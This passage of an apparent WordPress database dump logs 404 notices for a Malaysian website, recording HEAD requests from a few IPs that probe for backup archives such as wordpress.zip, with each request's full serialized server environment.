Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/news/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/news/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWgAAAVE\";s:12:\"REDIRECT_URL\";s:20:\"/news/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58894\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/news/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/news/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWgAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606585.1042\";s:12:\"REQUEST_TIME\";s:10:\"1569606585\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35514528,37309488,'http://bintara.com.my/news/well-known.zip',1,0,'198.50.204.224'),(27182,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/demo/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/demo/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/demo/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tQAAAAE\";s:12:\"REDIRECT_URL\";s:20:\"/demo/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58852\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/demo/well-known.zip\";s:10:\"SCRIPT_URL\";s:20:\"/demo/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.4815\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35514480,37307632,'http://bintara.com.my/demo/well-known.zip',1,0,'198.50.204.224'),(27183,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/portal/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/portal/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/portal/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWwAAAUs\";s:12:\"REDIRECT_URL\";s:22:\"/portal/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58898\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/portal/well-known.zip\";s:10:\"SCRIPT_URL\";s:22:\"/portal/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt3KlfXTtZ68oOVBXWwAAAUs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.9919\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35517672,37319848,'http://bintara.com.my/portal/well-known.zip',1,0,'198.50.204.224'),(27184,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/www/well-known.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/www/well-known.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/www/well-known.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tgAAABg\";s:12:\"REDIRECT_URL\";s:19:\"/www/well-known.zip\";s:11:\"REMOTE_ADDR\";s:14:\"198.50.204.224\";s:11:\"REMOTE_PORT\";s:5:\"58917\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/www/well-known.zip\";s:10:\"SCRIPT_URL\";s:19:\"/www/well-known.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Lt9s@3O4E744khfb8tgAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606584.4041\";s:12:\"REQUEST_TIME\";s:10:\"1569606584\";}}','notice','2019-09-27 17:50:28','2019-09-27 17:49:54',35512192,37304336,'http://bintara.com.my/www/well-known.zip',1,0,'198.50.204.224'),(27185,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wordpress/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"http://bintara.com.my/wordpress/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wordpress/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Mdds@3O4E744khfb9RQAAAAk\";s:12:\"REDIRECT_URL\";s:24:\"/wordpress/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:14:\"18.184.172.183\";s:11:\"REMOTE_PORT\";s:5:\"45550\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"http://bintara.com.my/wordpress/wordpress.zip\";s:10:\"SCRIPT_URL\";s:24:\"/wordpress/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Mdds@3O4E744khfb9RQAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606773.2312\";s:12:\"REQUEST_TIME\";s:10:\"1569606773\";}}','notice','2019-09-27 17:52:56','2019-09-27 17:52:53',35521160,37326920,'http://bintara.com.my/wordpress/wordpress.zip',1,0,'18.184.172.183'),(27186,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/www/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/www/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/www/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Mdds@3O4E744khfb9RQAAABY\";s:12:\"REDIRECT_URL\";s:18:\"/www/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:14:\"18.184.172.183\";s:11:\"REMOTE_PORT\";s:5:\"45552\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/www/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/www/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Mdds@3O4E744khfb9RQAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606773.2584\";s:12:\"REQUEST_TIME\";s:10:\"1569606773\";}}','notice','2019-09-27 17:52:56','2019-09-27 17:52:53',35518448,37320360,'http://bintara.com.my/www/wordpress.zip',1,0,'18.184.172.183'),(27187,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/2018/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/2018/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/2018/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXjAAAAUE\";s:12:\"REDIRECT_URL\";s:19:\"/2018/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52682\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/2018/wordpress.zip\";s:10:\"SCRIPT_URL\";s:19:\"/2018/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXjAAAAUE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.2723\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:58',35124928,36932008,'http://bintara.com.my/2018/wordpress.zip',1,0,'198.71.240.27'),(27188,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/old/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/old/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/old/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9UwAAAAQ\";s:12:\"REDIRECT_URL\";s:18:\"/old/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52692\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/old/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/old/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9UwAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606776.3728\";s:12:\"REQUEST_TIME\";s:10:\"1569606776\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:57',35126880,36927968,'http://bintara.com.my/old/wordpress.zip',1,0,'198.71.240.27'),(27189,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/wp2/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/wp2/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/wp2/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXhgAAAUU\";s:12:\"REDIRECT_URL\";s:18:\"/wp2/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52664\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/wp2/wordpress.zip\";s:10:\"SCRIPT_URL\";s:18:\"/wp2/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md3KlfXTtZ68oOVBXhgAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606775.7298\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:57',35126464,36928416,'http://bintara.com.my/wp2/wordpress.zip',1,0,'198.71.240.27'),(27190,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/news/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/news/wordpress.zip\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/news/wordpress.zip\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9SQAAAA8\";s:12:\"REDIRECT_URL\";s:19:\"/news/wordpress.zip\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.240.27\";s:11:\"REMOTE_PORT\";s:5:\"52660\";s:14:\"REQUEST_METHOD\";s:4:\"HEAD\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/news/wordpress.zip\";s:10:\"SCRIPT_URL\";s:19:\"/news/wordpress.zip\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5Md9s@3O4E744khfb9SQAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569606775.9521\";s:12:\"REQUEST_TIME\";s:10:\"1569606775\";}}','notice','2019-09-27 17:53:32','2019-09-27 17:52:57',35127176,36935088,'http://bintara.com.my/news/wordpress.zip',1,0,'198.71.240.27'),(27191,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/cms/wordpress.zip\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 